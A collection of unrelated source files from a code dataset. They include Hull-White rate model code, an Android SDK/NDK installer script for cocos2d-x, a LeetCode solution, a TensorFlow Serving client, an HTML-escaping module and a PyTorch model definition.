tf.repeat(tf.expand_dims(times, axis=-1), self._dim, axis=-1),
(1, 1, num_sim_steps, self._dim))
curve_times = tf.reshape(curve_times, (1, num_curve_nodes, 1, 1))
curve_times = tf.repeat(curve_times, self._dim, axis=-1)
mean_reversion = tf.reshape(
mean_reversion, (1, 1, self._dim, num_sim_steps))
# Transpose so the `dim` is the trailing dimension.
mean_reversion = tf.transpose(mean_reversion, [0, 1, 3, 2])
# Calculate the variable `y(t)` (described in [1], section 10.1.6.1)
# so that we have the full Markovian state to compute the P(t,T).
y_t = tf.reshape(tf.transpose(y_t), (1, 1, num_sim_steps, self._dim))
return self._bond_reconstitution(times, times + curve_times,
mean_reversion, short_rate,
y_t), rate_paths
def discount_bond_price(self, short_rate, times, maturities, name=None):
"""Returns zero-coupon bond prices `P(t,T)` conditional on `r(t)`.
Args:
short_rate: A `Tensor` of real dtype and shape `batch_shape + [dim]`
specifying the short rate `r(t)`.
times: A `Tensor` of real dtype and shape `batch_shape`. The time `t`
at which discount bond prices are computed.
maturities: A `Tensor` of real dtype and shape `batch_shape`. The time
to maturity of the discount bonds.
name: Str. The name to give this op.
Default value: `discount_bond_prices`.
Returns:
A `Tensor` of real dtype and the same shape as `batch_shape + [dim]`
containing the price of zero-coupon bonds.
"""
name = name or self._name + '_discount_bond_prices'
with tf.name_scope(name):
short_rate = tf.convert_to_tensor(short_rate, self._dtype)
times = tf.convert_to_tensor(times, self._dtype)
maturities = tf.convert_to_tensor(maturities, self._dtype)
# Flatten it because `PiecewiseConstantFunction` expects the first
# dimension to be broadcastable to [dim]
input_shape_times = times.shape.as_list()
times = tf.reshape(times, shape=[-1])
# The shape of `mean_reversion` will be (dim,n) where `n` is the number
# of elements in `times`.
mean_reversion = self._mean_reversion(times)
volatility = self._volatility(times)
y_t = self._compute_yt(times, mean_reversion, volatility)
times = tf.reshape(times, input_shape_times + [1])
maturities = tf.reshape(maturities, input_shape_times + [1])
mean_reversion = tf.reshape(tf.transpose(mean_reversion),
input_shape_times + [self._dim])
y_t = tf.reshape(tf.transpose(y_t), input_shape_times + [self._dim])
values = self._bond_reconstitution(
times, maturities, mean_reversion, short_rate, y_t)
return values
def _sample_paths(self,
times,
num_samples,
random_type,
skip,
seed):
"""Returns a sample of paths from the process."""
# Note: all the notations below are the same as in [1].
num_requested_times = times.shape[0]
    params = [self._mean_reversion, self._volatility]
    if self._corr_matrix is not None:
      params = params + [self._corr_matrix]
times, keep_mask = _prepare_grid(
times, params)
# Add zeros as a starting location
dt = times[1:] - times[:-1]
if dt.shape.is_fully_defined():
steps_num = dt.shape.as_list()[-1]
else:
steps_num = tf.shape(dt)[-1]
# TODO(b/148133811): Re-enable Sobol test when TF 2.2 is released.
if random_type == random.RandomType.SOBOL:
raise ValueError('Sobol sequence for Euler sampling is temporarily '
'unsupported when `time_step` or `times` have a '
'non-constant value')
# In order to use low-discrepancy random_type we need to generate the
# sequence of independent random normals upfront. We also precompute random
# numbers for stateless random type in order to ensure independent samples
    # for multiple function calls with different seeds.
if random_type in (random.RandomType.SOBOL,
random.RandomType.HALTON,
random.RandomType.HALTON_RANDOMIZED,
random.RandomType.STATELESS,
random.RandomType.STATELESS_ANTITHETIC):
normal_draws = utils.generate_mc_normal_draws(
num_normal_draws=self._dim, num_time_steps=steps_num,
num_sample_paths=num_samples, random_type=random_type,
seed=seed,
dtype=self._dtype, skip=skip)
else:
normal_draws = None
# The below is OK because we support exact discretization with piecewise
# constant mr and vol.
mean_reversion = self._mean_reversion(times)
volatility = self._volatility(times)
if self._corr_matrix is not None:
corr_matrix = _get_parameters(
times + tf.math.reduce_min(dt) / 2, self._corr_matrix)[0]
corr_matrix_root = tf.linalg.cholesky(corr_matrix)
else:
corr_matrix_root = None
exp_x_t = self._conditional_mean_x(times, mean_reversion, volatility)
var_x_t = self._conditional_variance_x(times, mean_reversion, volatility)
if self._dim == 1:
mean_reversion = tf.expand_dims(mean_reversion, axis=0)
cond_fn = lambda i, *args: i < tf.size(dt)
def body_fn(i, written_count,
current_x,
rate_paths):
"""Simulate hull-white process to the next time point."""
if normal_draws is None:
normals = random.mv_normal_sample(
(num_samples,),
mean=tf.zeros((self._dim,), dtype=mean_reversion.dtype),
random_type=random_type, seed=seed)
else:
normals = normal_draws[i]
if corr_matrix_root is not None:
normals = tf.linalg.matvec(corr_matrix_root[i], normals)
next_x = (tf.math.exp(-mean_reversion[:, i + 1] * dt[i]) * current_x
+ exp_x_t[:, i] + tf.math.sqrt(var_x_t[:, i]) * normals)
f_0_t = self._instant_forward_rate_fn(times[i + 1])
# Update `rate_paths`
rate_paths = utils.maybe_update_along_axis(
tensor=rate_paths,
do_update=keep_mask[i + 1],
ind=written_count,
axis=1,
new_tensor=tf.expand_dims(next_x, axis=1) + f_0_t)
written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)
return (i + 1, written_count, next_x, rate_paths)
rate_paths = tf.zeros((num_samples, num_requested_times, self._dim),
dtype=self._dtype)
initial_x = tf.zeros((num_samples, self._dim), dtype=self._dtype)
# TODO(b/157232803): Use tf.cumsum instead?
_, _, _, rate_paths = tf.while_loop(
cond_fn, body_fn, (0, 0, initial_x, rate_paths))
return rate_paths
def _bond_reconstitution(self,
times,
maturities,
mean_reversion,
short_rate,
y_t):
"""Compute discount bond prices using Eq. 10.18 in Ref [2]."""
f_0_t = self._instant_forward_rate_fn(times)
x_t = short_rate - f_0_t
p_0_t = tf.math.exp(-self._initial_discount_rate_fn(times) * times)
p_0_t_tau = tf.math.exp(
-self._initial_discount_rate_fn(maturities) *
(maturities)) / p_0_t
g_t_tau = (1. - tf.math.exp(
-mean_reversion * (maturities - times))) / mean_reversion
term1 = x_t * g_t_tau
term2 = y_t * g_t_tau**2
p_t_tau = p_0_t_tau * tf.math.exp(-term1 - 0.5 * term2)
return p_t_tau
def _exact_discretization_setup(self, dim):
"""Initial setup for efficient computations."""
self._zero_padding = tf.zeros((dim, 1), dtype=self._dtype)
self._jump_locations = tf.concat(
[self._volatility.jump_locations(),
self._mean_reversion.jump_locations()], axis=-1)
self._jump_values_vol = self._volatility(self._jump_locations)
self._jump_values_mr = self._mean_reversion(self._jump_locations)
if dim == 1:
self._padded_knots = tf.concat([
self._zero_padding,
tf.expand_dims(self._jump_locations[:-1], axis=0)
], axis=1)
self._jump_values_vol = tf.expand_dims(self._jump_values_vol, axis=0)
self._jump_values_mr = tf.expand_dims(self._jump_values_mr, axis=0)
self._jump_locations = tf.expand_dims(self._jump_locations, axis=0)
else:
self._padded_knots = tf.concat(
[self._zero_padding, self._jump_locations[:, :-1]], axis=1)
def _compute_yt(self, t, mr_t, sigma_t):
"""Computes y(t) as described in [1], section 10.1.6.1."""
t = tf.repeat(tf.expand_dims(t, axis=0), self._dim, axis=0)
time_index = tf.searchsorted(self._jump_locations, t)
y_between_vol_knots = self._y_integral(
self._padded_knots, self._jump_locations, self._jump_values_vol,
self._jump_values_mr)
y_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(y_between_vol_knots)], axis=1)
vn = tf.concat(
[self._zero_padding, self._jump_locations], axis=1)
y_t = self._y_integral(
tf.gather(vn, time_index, batch_dims=1), t, sigma_t, mr_t)
y_t = y_t + tf.gather(y_at_vol_knots, time_index, batch_dims=1)
return tf.math.exp(-2 * mr_t * t) * y_t
def _conditional_mean_x(self, t, mr_t, sigma_t):
"""Computes the drift term in [1], Eq. 10.39."""
t = tf.repeat(tf.expand_dims(t, axis=0), self._dim, axis=0)
time_index = tf.searchsorted(self._jump_locations, t)
vn = tf.concat([self._zero_padding, self._jump_locations], axis=1)
y_between_vol_knots = self._y_integral(self._padded_knots,
self._jump_locations,
self._jump_values_vol,
self._jump_values_mr)
y_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(y_between_vol_knots)], axis=1)
ex_between_vol_knots = self._ex_integral(self._padded_knots,
self._jump_locations,
self._jump_values_vol,
self._jump_values_mr,
y_at_vol_knots[:, :-1])
ex_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(ex_between_vol_knots)], axis=1)
c = tf.gather(y_at_vol_knots, time_index, batch_dims=1)
exp_x_t = self._ex_integral(
tf.gather(vn, time_index, batch_dims=1), t, sigma_t, mr_t, c)
exp_x_t = exp_x_t + tf.gather(ex_at_vol_knots, time_index, batch_dims=1)
exp_x_t = (exp_x_t[:, 1:] - exp_x_t[:, :-1]) * tf.math.exp(
-tf.broadcast_to(mr_t, t.shape)[:, 1:] * t[:, 1:])
return exp_x_t
def _y_integral(self, t0, t, vol, k):
"""Computes int_t0^t sigma(u)^2 exp(2*k*u) du."""
return (vol * vol) / (2 * k) * (
tf.math.exp(2 * k * t) - tf.math.exp(2 * k * t0))
def _ex_integral(self, t0, t, vol, k, y_t0):
"""Function computes the integral for the drift calculation."""
# Computes int_t0^t (exp(k*s)*y(s)) ds,
    # where y(s) = y(t0) + int_t0^s exp(-2*(s-u)) vol(u)^2 du.
value = (
tf.math.exp(k * t) - tf.math.exp(k * t0) + tf.math.exp(2 * k * t0) *
(tf.math.exp(-k * t) - tf.math.exp(-k * t0)))
value = value * vol**2 / (2 * k * k) + y_t0 * (tf.math.exp(-k * t0) -
tf.math.exp(-k * t)) / k
return value
def _conditional_variance_x(self, t, mr_t, sigma_t):
"""Computes the variance of x(t), see [1], Eq. 10.41."""
t = tf.repeat(tf.expand_dims(t, axis=0), self._dim, axis=0)
var_x_between_vol_knots = self._variance_int(self._padded_knots,
self._jump_locations,
self._jump_values_vol,
self._jump_values_mr)
varx_at_vol_knots = tf.concat(
[self._zero_padding,
_cumsum_using_matvec(var_x_between_vol_knots)],
axis=1)
time_index = tf.searchsorted(self._jump_locations, t)
vn = tf.concat(
[self._zero_padding,
self._jump_locations], axis=1)
var_x_t = self._variance_int(
tf.gather(vn, time_index, batch_dims=1), t, sigma_t, mr_t)
var_x_t = var_x_t + tf.gather(varx_at_vol_knots, time_index, batch_dims=1)
var_x_t = (var_x_t[:, 1:] - var_x_t[:, :-1]) * tf.math.exp(
-2 * tf.broadcast_to(mr_t, t.shape)[:, 1:] * t[:, 1:])
return var_x_t
def _variance_int(self, t0, t, vol, k):
"""Computes int_t0^t exp(2*k*s) vol(s)^2 ds."""
return vol * vol / (2 * k) * (
tf.math.exp(2 * k * t) - tf.math.exp(2 * k * t0))
def _get_parameters(times, *params):
"""Gets parameter values at at specified `times`."""
res = []
for param in params:
if isinstance(param, piecewise.PiecewiseConstantFunc):
jump_locations = param.jump_locations()
if len(jump_locations.shape) > 1:
# If `jump_locations` has batch dimension, transpose the result
# Shape [num_times, dim]
res.append(tf.transpose(param(times)))
else:
# Shape [num_times, dim]
res.append(param(times))
elif callable(param):
# Used only in drift and volatility computation.
# Here `times` is of shape [1]
t = tf.squeeze(times)
# The result has to have shape [1] + param.shape
res.append(tf.expand_dims(param(t), 0))
else:
res.append(param + tf.zeros(times.shape + param.shape, dtype=times.dtype))
return res
def _prepare_grid(times, *params):
"""Prepares grid of times for path generation.
Args:
times: Rank 1 `Tensor` of increasing positive real values. The times at
which the path points are to be evaluated.
    *params: Parameters of the Hull-White model. Either scalar `Tensor`s of
      the same `dtype` or instances of `PiecewiseConstantFunc`.
Returns:
Tuple `(all_times, mask)`.
    `all_times` is a 1-D real `Tensor` containing all points from `times`,
    the value `0`, and the jump locations of the piecewise constant
    parameters. The `Tensor` is sorted in ascending order and may contain
    duplicates.
    `mask` is a boolean 1-D `Tensor` of the same shape as `all_times`, showing
    which elements of `all_times` correspond to the values from `times`.
    Guarantees that `all_times[0] = 0` and `mask[0] = False`.
"""
additional_times = []
for param in params:
if hasattr(param, 'is_piecewise_constant'):
if param.is_piecewise_constant:
# Flatten all jump locations
additional_times.append(tf.reshape(param.jump_locations(), [-1]))
zeros = tf.constant([0], dtype=times.dtype)
all_times = tf.concat([zeros] + [times] + additional_times, axis=0)
additional_times_mask = [
tf.zeros_like(times, dtype=tf.bool) for times in additional_times]
mask = tf.concat([
tf.cast(zeros, dtype=tf.bool),
tf.ones_like(times, dtype=tf.bool)
] + additional_times_mask, axis=0)
perm = tf.argsort(all_times, stable=True)
all_times = tf.gather(all_times, perm)
mask = tf.gather(mask, perm)
return all_times, mask
def _input_type(param, dim, dtype, name):
"""Checks if the input parameter is a callable or piecewise constant."""
# If the parameter is callable but not a piecewise constant use
# generic sampling method (e.g., Euler).
sample_with_generic = False
if hasattr(param, 'is_piecewise_constant'):
if param.is_piecewise_constant:
jumps_shape = param.jump_locations().shape
if len(jumps_shape) > 2:
raise ValueError(
'Batch rank of `jump_locations` should be `1` for all piecewise '
'constant arguments but {} instead'.format(len(jumps_shape[:-1])))
if len(jumps_shape) == 2:
if dim != jumps_shape[0]:
raise ValueError(
'Batch shape of `jump_locations` should be either empty or '
'`[{0}]` but `[{1}]` instead'.format(dim, jumps_shape[0]))
if name == 'mean_reversion' and jumps_shape[0] > 0:
# Exact discretization currently not supported with time-dependent mr
sample_with_generic = True
return param, sample_with_generic
else:
sample_with_generic = True
elif callable(param):
sample_with_generic = True
else:
# Otherwise, input is a `Tensor`, return a `PiecewiseConstantFunc`.
param = tf.convert_to_tensor(param, dtype=dtype, name=name)
param_shape = param.shape.as_list()
param_rank = param.shape.rank
if param_shape[-1] != dim:
# This is an error, we need as many parameters as the number of `dim`
raise ValueError(
          'Length of {} ({}) should be the same as `dim` ({}).'.format(
              name, param_shape[-1], dim))
if param_rank == 2:
# This is when the parameter is a correlation matrix
jump_locations = []
values = tf.expand_dims(param, axis=0)
else:
jump_locations = [] if dim == 1 else [[]] * dim
values = param if dim == 1 else tf.expand_dims(param, axis=-1)
param = piecewise.PiecewiseConstantFunc(
jump_locations=jump_locations, values=values,
dtype=dtype)
return param, sample_with_generic
def _cumsum_using_matvec(input_tensor):
"""Computes cumsum using matrix algebra."""
dtype = input_tensor.dtype
axis_length = input_tensor.shape.as_list()[-1]
ones = tf.ones([axis_length, axis_length], dtype=dtype)
lower_triangular = tf.linalg.band_part(ones, -1, 0)
cumsum = tf.linalg.matvec(lower_triangular, input_tensor)
return cumsum
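# A minimal sanity check for `_cumsum_using_matvec` (illustrative sketch only;
# assumes TF2 eager execution is enabled):
#
#   x = tf.constant([[1.0, 2.0, 3.0]])
#   # Multiplying by a lower-triangular matrix of ones yields the running sum
#   # along the last axis, i.e. [[1.0, 3.0, 6.0]] == tf.cumsum(x, axis=-1).
#   print(_cumsum_using_matvec(x))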
|
the-stack_0_6115 | #!/usr/bin/env python
'''
Download and install the Android SDK and NDK used to build cocos2d-x, then
write the matching environment variables to helper files next to the
cocos2d-x checkout.
'''
import os
import urllib
import zipfile
import platform
import sys
import subprocess
import tempfile
import argparse
from retry import retry
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
COCOS2D_X = os.path.abspath(os.path.join(DIR_PATH, "../.."))
# ROOT_DIR/cocos2d-x
ROOT_DIR = os.path.abspath(os.path.join(COCOS2D_X, ".."))
ANDROID_NDK = os.path.join(ROOT_DIR, "android-ndk-r16b")
ANDROID_SDK = os.path.join(ROOT_DIR, "android-sdk")
SDK_MANAGER = os.path.join(ROOT_DIR, "sdk_tools/tools/bin/sdkmanager")
SYSTEM = platform.system().lower()
if SYSTEM == "windows":
SDK_MANAGER = SDK_MANAGER + ".bat"
def run(command):
print("=" * 80)
print(command)
subprocess.check_call(command.split())
def run_with_yes(command):
print("=" * 80)
print("yes|" + command)
f = tempfile.TemporaryFile("w")
repeat_yes = 50
f.write("y\n" * repeat_yes)
f.seek(0)
subprocess.check_call(command.split(), stdin=f)
def unzip(zip_file, directory):
print("=" * 80)
print("Unzip: " + zip_file + " to " + directory)
if SYSTEM == "windows":
zipfile.ZipFile(zip_file).extractall(directory)
else:
        # the zipfile module ignores file permissions (e.g. +x), so use unzip
cmd = "unzip -d " + directory + " " + zip_file
subprocess.check_output(cmd.split())
def download(url, zip_file):
print("=" * 80)
print("Download: " + url + ", file: " + zip_file)
try:
os.remove(zip_file)
except OSError:
pass
urllib.urlretrieve(url, zip_file)
@retry(Exception, tries=5, delay=1, backoff=1)
def install_android_ndk():
file_name = "android-ndk-r16b-" + SYSTEM + "-x86_64.zip"
url = "https://dl.google.com/android/repository/" + file_name
zip_file = os.path.abspath(os.path.join(ROOT_DIR, file_name))
download(url, zip_file)
unzip(zip_file, ROOT_DIR)
@retry(Exception, tries=5, delay=1, backoff=1)
def install_android_sdk_tools():
file_name = "sdk-tools-{system}-3859397.zip".format(
system=platform.system().lower())
url = "https://dl.google.com/android/repository/" + file_name
zip_file = os.path.abspath(os.path.join(ROOT_DIR, file_name))
download(url, zip_file)
unzip(zip_file, os.path.join(ROOT_DIR, "sdk_tools"))
@retry(Exception, tries=5, delay=1, backoff=1)
def install_android_sdk():
switches = " --verbose --sdk_root=" + ANDROID_SDK + " "
cmd1 = SDK_MANAGER + switches
packages = [
"platforms;android-27",
"build-tools;28.0.3",
"platform-tools",
"tools"
]
cmd = cmd1 + " ".join(packages)
run_with_yes(cmd)
def export_environment(ndk_only):
with open(os.path.join(ROOT_DIR, "environment.sh"), "a") as myfile:
if not ndk_only:
myfile.write("export ANDROID_HOME=" + ANDROID_SDK + "\n")
myfile.write("export ANDROID_SDK_ROOT=" + ANDROID_SDK + "\n")
myfile.write("export ANDROID_NDK_HOME=" + ANDROID_NDK + "\n")
myfile.write("export NDK_ROOT=" + ANDROID_NDK + "\n")
with open(os.path.join(ROOT_DIR, "environment.ps1"), "a") as myfile:
if not ndk_only:
myfile.write("$env:ANDROID_HOME=\"" + ANDROID_SDK + "\"\n")
myfile.write("$env:ANDROID_SDK_ROOT=\"" + ANDROID_SDK + "\"\n")
myfile.write("$env:ANDROID_NDK_HOME=\"" + ANDROID_NDK + "\"\n")
myfile.write("$env:NDK_ROOT=\"" + ANDROID_NDK + "\"\n")
def main(ndk_only):
if not ndk_only:
install_android_sdk_tools()
install_android_sdk()
install_android_ndk()
export_environment(ndk_only)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Install android sdk/ndk')
parser.add_argument("--ndk_only", help="Install ndk only", action="store_true")
args = parser.parse_args()
main(args.ndk_only)
|
the-stack_0_6116 | #!/usr/bin/env python
# coding: utf-8
"""
Plot Fig.3 from paper.
"""
from __future__ import print_function, unicode_literals
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
import scipy.special
import progressbar
sys.path.insert(
0,
os.path.abspath(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'..'
))
)
from simus import custom_mpl
from simus import floquet
from simus import operators
from simus import tools
def RWA_frequency(n_bar, data):
"""
Compute the ac Stark shifted frequency using the time-averaged model.
"""
epsilon_p = operators.compute_epsilon_p(n_bar, data['params'])
H_shunted, args, _, _ = operators.build_shunted_hamiltonian(
data['N_max_a'], data['N_max_b'], epsilon_p, data['params']
)
# Compute the time-averaged hamiltonian
H = (
H_shunted[0] +
scipy.special.jv(0, args['oscillating_prefactor']) * H_shunted[1][0]
)
# ac Stark shifted frequency can be computed through the difference of
# eigenenergies
eigv = H.eigenenergies()
return (eigv[2] - eigv[0]) / (2 * np.pi)
def main(out_directory, overlaps_threshold):
"""
Main entry point for this script.
:param out_directory: Directory to load dumps from. Typically
``out/shunted_final_params``.
:param overlaps_threshold: Absolute threshold for selecting a frequency.
"""
# Load data
(
loaded_data,
max_N_max_a, max_N_max_b,
omega_a, omega_p,
kerr, f_0
) = tools.load_data(out_directory)
# Compute omega_bar_a from any n_bar value
any_n_bar = next(iter(loaded_data))
omega_bar_a = operators.compute_shunted_parameters(
operators.compute_epsilon_p(
any_n_bar,
loaded_data[any_n_bar]['params']
),
loaded_data[any_n_bar]['params']
)[0]
# Data to plot
frequencies = [] # This is a list of dicts, see below
RWA_frequencies = []
transmon_populations = np.zeros((max_N_max_b, len(loaded_data.keys())))
mean_transmon_excitations, purities = [], []
bar = progressbar.ProgressBar(max_value=len(loaded_data.keys()))
for y, (n_bar, data) in bar(enumerate(loaded_data.items())):
frequencies.extend(
tools.find_frequencies_from_overlaps(
n_bar, data, overlaps_threshold
)
)
RWA_frequencies.append(RWA_frequency(n_bar, data))
# Write steadystate in real tensor space
real_ss = floquet.floquet_basis_transform(
data['f_modes_0'], data['steadystate']
)
# Compute transmon populations
transmon_populations[:data['N_max_b'], y] = np.abs(
real_ss.ptrace(1).diag()
)
mean_transmon_excitations.append(np.sum([
k * pop
for k, pop in enumerate(transmon_populations[:data['N_max_b'], y])
]))
# Compute purities
purities.append(np.sum(data['steadystate'].diag()**2))
# Plot everything
with plt.rc_context(rc=custom_mpl.custom_rc()):
fig = plt.figure(figsize=(15, 15))
# Define grid
gs = gridspec.GridSpec(3, 1, height_ratios=[0.05, 1, 1])
colorbar_axis = fig.add_subplot(gs[0, :])
transmon_pops_axis = fig.add_subplot(gs[1, 0])
frequencies_axis = fig.add_subplot(gs[-1, 0],
sharex=transmon_pops_axis)
# Disable ticks on shared axes
plt.setp(transmon_pops_axis.get_xticklabels(), visible=False)
# Plot transmon populations
colorbar = tools.plot_article_pops(
loaded_data.keys(), range(max_N_max_b), transmon_populations,
transmon_pops_axis,
ylabel="Transmon eigenstates",
eyeguide=mean_transmon_excitations,
eyeguide_color=custom_mpl.PALETTE[7],
threshold=None
)
fig.colorbar(colorbar, cax=colorbar_axis, orientation="horizontal")
# Plot purities on the right axis
purities_axis = transmon_pops_axis.twinx()
purities_axis.plot(
loaded_data.keys(),
purities,
color=custom_mpl.PALETTE[0],
linewidth=3.0
)
purities_axis.set_ylim((0, 1))
purities_axis.set_ylabel(
r"$\mathrm{Tr}\left[\rho_{\mathrm{ss}}(0)^2\right]$"
)
# Plot found frequencies
frequencies_axis.plot(
loaded_data.keys(),
[omega_bar_a / (2 * np.pi) for x in loaded_data.keys()],
color=custom_mpl.PALETTE[1],
zorder=1
)
frequencies_axis.plot(
loaded_data.keys(),
RWA_frequencies,
color=custom_mpl.PALETTE[3],
linewidth=3.0,
zorder=2
)
for point in frequencies:
frequencies_axis.scatter(
point['n_bar'],
point['frequency'],
s=point['area'],
color=custom_mpl.PALETTE[0],
zorder=3
)
frequencies_axis.set_ylim((np.min(RWA_frequencies) - 5e-3, f_0 + 5e-3))
frequencies_axis.set_ylabel(r'$\omega_{\mathrm{ac}} / 2 \pi$ (in GHz)')
# Set X axis label
frequencies_axis.set_xlabel(
r'$\left|a_p\right|^2 / '
r'\left[4 \left|\omega_p - \omega_a\right|^2\right] '
r'\approx \bar{n}$'
)
for ax in [transmon_pops_axis, purities_axis, frequencies_axis]:
ax.margins(x=0.01)
ax.xaxis.set_minor_locator(matplotlib.ticker.AutoMinorLocator(n=2))
ax.yaxis.set_minor_locator(matplotlib.ticker.AutoMinorLocator(n=2))
# Save figure
fig.tight_layout()
fig.savefig(os.path.join(out_directory, 'fig3.pdf'))
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(
'Usage: %s OUT_DIRECTORY [OVERLAPS_THRESHOLD]' %
sys.argv[0]
)
out_directory = sys.argv[1]
overlaps_threshold = 0.1
if len(sys.argv) > 2:
overlaps_threshold = float(sys.argv[2])
main(out_directory, overlaps_threshold)
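# Typical invocation (the script name and dump directory are illustrative; the
# directory must contain the dumps produced by the simulation runs):
#
#   python plot_fig3.py out/shunted_final_params 0.1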
|
the-stack_0_6119 | # Time complexity: O(m*n)
# Approach: DP Solution (https://www.geeksforgeeks.org/count-distinct-occurrences-as-a-subsequence/)
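# Worked example (illustrative, standard LeetCode cases):
#   Solution().numDistinct("rabbbit", "rabbit") == 3
#   Solution().numDistinct("babgbag", "bag") == 5
# Here dp[i][j] counts the distinct subsequences of s[:j] that equal t[:i]:
# row 0 is all 1s (the empty target can always be formed once), and when
# t[i-1] == s[j-1] we either consume s[j-1] (dp[i-1][j-1]) or skip it
# (dp[i][j-1]).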
class Solution:
def numDistinct(self, s: str, t: str) -> int:
m, n = len(t), len(s)
if m>n:
return 0
dp = [[0]*(n+1) for i in range(m+1)]
for i in range(m+1):
dp[i][0] = 0
for i in range(n+1):
dp[0][i] = 1
for i in range(1, m+1):
for j in range(1, n+1):
if t[i-1]==s[j-1]:
dp[i][j] = dp[i][j-1]+dp[i-1][j-1]
else:
dp[i][j] = dp[i][j-1]
return dp[m][n] |
the-stack_0_6120 | import tensorflow as tf
import grpc
from tensorflow_serving.apis import prediction_service_pb2_grpc, predict_pb2
model_name = "address"
host = "10.100.51.111"
port = 8090
timeout = 10.0
channel = grpc.insecure_channel("%s:%d" % (host, port))
stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
def send_request(batch_tokens):
batch_tokens, lengths, max_length = pad_batch(batch_tokens)
batch_size = len(lengths)
request = predict_pb2.PredictRequest()
request.model_spec.name = model_name
request.inputs["tokens"].CopyFrom(
tf.make_tensor_proto([batch_tokens], shape=(batch_size, max_length)))
request.inputs["length"].CopyFrom(
tf.make_tensor_proto(lengths, shape=(batch_size,)))
future = stub.Predict.future(request, timeout)
batch_output = parse_translation_result(future.result())
batch_output = parse_result_to_utf8_text(batch_output)
return batch_output
def parse_translation_result(result):
batch_predictions = tf.make_ndarray(result.outputs["tokens"])
batch_lengths = tf.make_ndarray(result.outputs["length"])
for hypotheses, lengths in zip(batch_predictions, batch_lengths):
best_hypothesis = hypotheses[0]
best_length = lengths[0] - 1
yield best_hypothesis[:best_length]
def parse_result_to_utf8_text(results):
batch_output = []
for result in results:
tokens = []
for r in list(result):
tokens.append(str(r, encoding='utf8'))
batch_output.append(tokens)
return batch_output
def pad_batch(batch_tokens):
lengths = [len(address) for address in batch_tokens]
max_lengths = max(lengths)
for tokens, length in zip(batch_tokens, lengths):
if max_lengths > length:
tokens += [""] * (max_lengths - length)
return batch_tokens, lengths, max_lengths
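# Example of the padding helper (illustrative):
#   pad_batch([["top", "hat"], ["scarf"]])
#   -> ([["top", "hat"], ["scarf", ""]], [2, 1], 2)
# Every token list is right-padded with empty strings up to the longest list
# in the batch; the original lengths are returned for the `length` input.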
if __name__ == "__main__":
# address = ['土', '悔', '市', '浦', '东', '新', '区', '张', '栋', '路', '1387', '号']
addresses = [['土悔市', '浦东新区', '张栋路', '1387', '号'],
['土悔市', '浦东新区', '章东路'],
['土悔市', '浦A新区']]
result = send_request(addresses)
print(result)
|
the-stack_0_6121 | import typing as t
from . import Markup
def escape(s: t.Any) -> Markup:
"""Replace the characters ``&``, ``<``, ``>``, ``'``, and ``"`` in
the string with HTML-safe sequences. Use this if you need to display
text that might contain such characters in HTML.
If the object has an ``__html__`` method, it is called and the
return value is assumed to already be safe for HTML.
:param s: An object to be converted to a string and escaped.
:return: A :class:`Markup` string with the escaped text.
"""
if hasattr(s, "__html__"):
return Markup(s.__html__())
return Markup(
str(s)
.replace("&", "&")
.replace(">", ">")
.replace("<", "<")
.replace("'", "'")
.replace('"', """)
)
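# Example of the escaping behaviour (illustrative):
#   escape('<b>"Hi" & bye</b>')
#   -> Markup('&lt;b&gt;&#34;Hi&#34; &amp; bye&lt;/b&gt;')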
def escape_silent(s: t.Optional[t.Any]) -> Markup:
"""Like :func:`escape` but treats ``None`` as the empty string.
Useful with optional values, as otherwise you get the string
``'None'`` when the value is ``None``.
>>> escape(None)
Markup('None')
>>> escape_silent(None)
Markup('')
"""
if s is None:
return Markup()
return escape(s)
def soft_str(s: t.Any) -> str:
"""Convert an object to a string if it isn't already. This preserves
a :class:`Markup` string rather than converting it back to a basic
string, so it will still be marked as safe and won't be escaped
again.
>>> value = escape("<User 1>")
>>> value
    Markup('&lt;User 1&gt;')
    >>> escape(str(value))
    Markup('&amp;lt;User 1&amp;gt;')
    >>> escape(soft_str(value))
    Markup('&lt;User 1&gt;')
"""
if not isinstance(s, str):
return str(s)
return s
def soft_unicode(s: t.Any) -> str:
import warnings
warnings.warn(
"'soft_unicode' has been renamed to 'soft_str'. The old name"
" will be removed in version 2.1.",
DeprecationWarning,
stacklevel=2,
)
return soft_str(s)
|
the-stack_0_6123 | # -*- coding: utf-8 -*-
"""
Created on Sun Jul 5 11:00:05 2020
@author: hto_r
"""
import torch
from torchvision import datasets, transforms , models
from torch import nn, optim
import torch.nn.functional as F
def DL_model (HL_1, HL_2, Activation_function, dropout):
""" Function to define a simple 2 hidden layer Neural network
args:
HL_1: int with the dimension of the first hidden layer
HL_2: int with the dimension of the second hidden layer
Activation_function: string with an activation
function recognized by pytorch
dropout: float, probability to dropout every neuron before each layer
returns
pytorch model
"""
device =torch.device ("cuda" if torch.cuda.is_available() else "cpu")
    if Activation_function == 'relu':
        model = DL_model_relu_2HL(HL_1, HL_2, dropout)
    else:
        raise ValueError('Unsupported activation function: ' + str(Activation_function))
    model.to(device)
    return model
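# Minimal usage sketch (hyperparameters below are illustrative, not taken from
# the original experiments). The network expects inputs that flatten to
# 50 * 50 * 3 = 7500 features and returns log-probabilities over 4 classes:
#
#   model = DL_model(HL_1=512, HL_2=256, Activation_function='relu', dropout=0.2)
#   x = torch.randn(8, 3, 50, 50)   # dummy batch; move to CUDA if available
#   log_probs = model(x)            # shape: (8, 4)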
def DL_model_relu_2HL (HL_1, HL_2, dropout=0.2):
""" Function to define a simple 2 hidden layer Neural network
args:
HL_1: int with the dimension of the first hidden layer
HL_2: int with the dimension of the second hidden layer
dropout: float, probability to dropout every neuron before each layer
returns
pytorch model
"""
device =torch.device ("cuda" if torch.cuda.is_available() else "cpu")
class Grainsize_model (nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(50**2*3, HL_1)
self.fc2 = nn.Linear(HL_1, HL_2)
self.fc3 = nn.Linear(HL_2, 100)
self.fc4 = nn.Linear(100, 4)
            self.Dropout = nn.Dropout(p=dropout)
def forward (self, x):
x= x.view(x.shape[0], -1)
x= self.Dropout(F.relu(self.fc1(x)))
